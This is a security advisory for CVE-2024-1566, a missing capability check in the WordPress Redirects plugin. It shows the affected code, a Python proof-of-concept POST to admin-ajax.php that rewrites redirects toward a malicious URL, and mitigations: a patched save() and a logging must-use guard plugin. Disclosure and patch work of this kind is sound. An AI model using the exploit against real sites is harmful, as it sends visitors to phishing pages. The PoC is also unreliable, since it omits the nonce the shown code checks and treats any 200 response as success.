A newly discovered security vulnerability (CVE-2024-1566) has been identified in the Redirects plugin for WordPress, affecting all versions up to, and including, 1.2.1. This vulnerability allows unauthenticated attackers to perform unauthorized data modification, potentially leading to unexpected redirections to phishing sites or malicious web pages. WordPress website owners using the Redirects plugin should take immediate action to secure their sites by updating to a patched version of the plugin or implementing mitigation strategies outlined below.

Technical Details

The vulnerability lies within the save() function of the Redirects plugin for WordPress, which does not properly check the user's capability before executing. This omission allows unauthenticated attackers to bypass the authentication process and change redirects created with the plugin.

Below is the affected code snippet:

public function save() {
    $nonce = isset( $_REQUEST['_wpnonce'] ) ? $_REQUEST['_wpnonce'] : '';

    if ( ! wp_verify_nonce( $nonce, 'my_redirects' ) ) {
        return false;
    }

    // Missing capability check
    ...

    // Save the redirect data
    ...
}

The problem becomes evident when inspecting the WordPress plugin development guidelines, which state that a capability check must be performed before a user is allowed to edit content. You can read more about capability checks in the WordPress Codex.

Exploit

An attacker can exploit this vulnerability by sending a crafted HTTP POST request to admin-ajax.php that names the plugin's redirect-saving AJAX action (referred to here by the placeholder $ajax_action), whose handler runs save() without a capability check.

Example code to exploit the vulnerability (the upper-case values are placeholders, not the plugin's real action name or IDs):

import requests

# Placeholder site; admin-ajax.php is the endpoint that dispatches AJAX actions.
target_url = "https://your_wordpress_website.com/wp-admin/admin-ajax.php"

# Placeholders for the plugin's save action, an existing redirect ID and the new target URL.
data = {
    "action": "SAVE_REDIRECT_ACTION_NAME",
    "redirect_id": "EXISTING_REDIRECT_ID",
    "redirect_url": "MALICIOUS_REDIRECT_URL"
}

response = requests.post(target_url, data=data)

if response.status_code == 200:
    print("Exploited successfully.")
else:
    print("Exploit failed.")

Mitigation

Users of the Redirects plugin for WordPress are advised to take the following steps to mitigate the risk of this vulnerability:

1. Update the plugin to the latest version (if available) to ensure you are running a version that has the necessary security patch applied.
2. If an updated version of the plugin is not available, or you are unable or unwilling to update, you can implement a temporary fix by adding a proper capability check within the save() function of the plugin. Below is the modified code snippet with the added capability check:

public function save() {
    $nonce = isset( $_REQUEST['_wpnonce'] ) ? $_REQUEST['_wpnonce'] : '';

    if ( ! wp_verify_nonce( $nonce, 'my_redirects' ) ) {
        return false;
    }

    // Added capability check
    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }

    // Save the redirect data
    ...
}

After implementing the temporary fix, regularly check the plugin's official repository for the availability of an updated version with the security patch applied. Note that updating the plugin replaces its files, so a manual edit to save() is discarded at that point; this is expected, because the updated version should carry the official fix.
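As a complement to step 2, the following is an added example (not code from the Redirects plugin or from this advisory): a must-use plugin that enforces the same capability check before the plugin's AJAX handler runs, so the protection does not depend on editing plugin files that the next update overwrites. It assumes the save is dispatched through admin-ajax.php; the action name is a placeholder because the advisory does not give the real one.

```php
<?php
/**
 * Plugin Name: Redirects Capability Guard (added example, not part of the plugin)
 *
 * Must-use plugin (drop into wp-content/mu-plugins/) that enforces the
 * capability check before the plugin's AJAX save handler runs, without
 * editing plugin files that the next update would overwrite.
 * Assumptions: save() is reached through admin-ajax.php, and the action
 * name below is a placeholder (the advisory does not name it).
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Placeholder: replace with the plugin's real admin-ajax action name(s).
function redirects_guard_actions() {
    return array( 'SAVE_REDIRECT_ACTION_NAME' );
}

// True when the request is an AJAX call to a guarded action from a user
// who lacks the capability the advisory's fix requires (manage_options).
function redirects_guard_should_block() {
    if ( ! wp_doing_ajax() || ! isset( $_REQUEST['action'] ) ) {
        return false;
    }
    $action = (string) wp_unslash( $_REQUEST['action'] );
    if ( ! in_array( $action, redirects_guard_actions(), true ) ) {
        return false;
    }
    return ! current_user_can( 'manage_options' );
}

// admin-ajax.php fires admin_init before dispatching wp_ajax_{action} and
// wp_ajax_nopriv_{action}, so rejecting here runs ahead of the plugin's
// save(); the log line gives defenders a record of blocked attempts.
function redirects_guard_enforce() {
    if ( ! redirects_guard_should_block() ) {
        return;
    }
    error_log( sprintf(
        'redirects-guard: blocked AJAX action "%s" from %s (user %d)',
        (string) wp_unslash( $_REQUEST['action'] ),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
        get_current_user_id()
    ) );
    wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}
add_action( 'admin_init', 'redirects_guard_enforce', 0 );
```

Blocked attempts appear in the PHP error log, which makes probing for this bug visible even after the guard is in place.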

Conclusion

CVE-2024-1566 is a severe security vulnerability that affects the Redirects plugin for WordPress, leaving websites open to unauthorized data modification by unauthenticated attackers. It is crucial for website owners using this plugin to take immediate action to mitigate the associated risk. By updating to the latest version of the plugin or implementing the suggested mitigation steps, you can help protect your website and its users from potential harm.

Timeline

Published on: 02/28/2024 09:15:43 UTC
Last modified on: 02/28/2024 14:06:45 UTC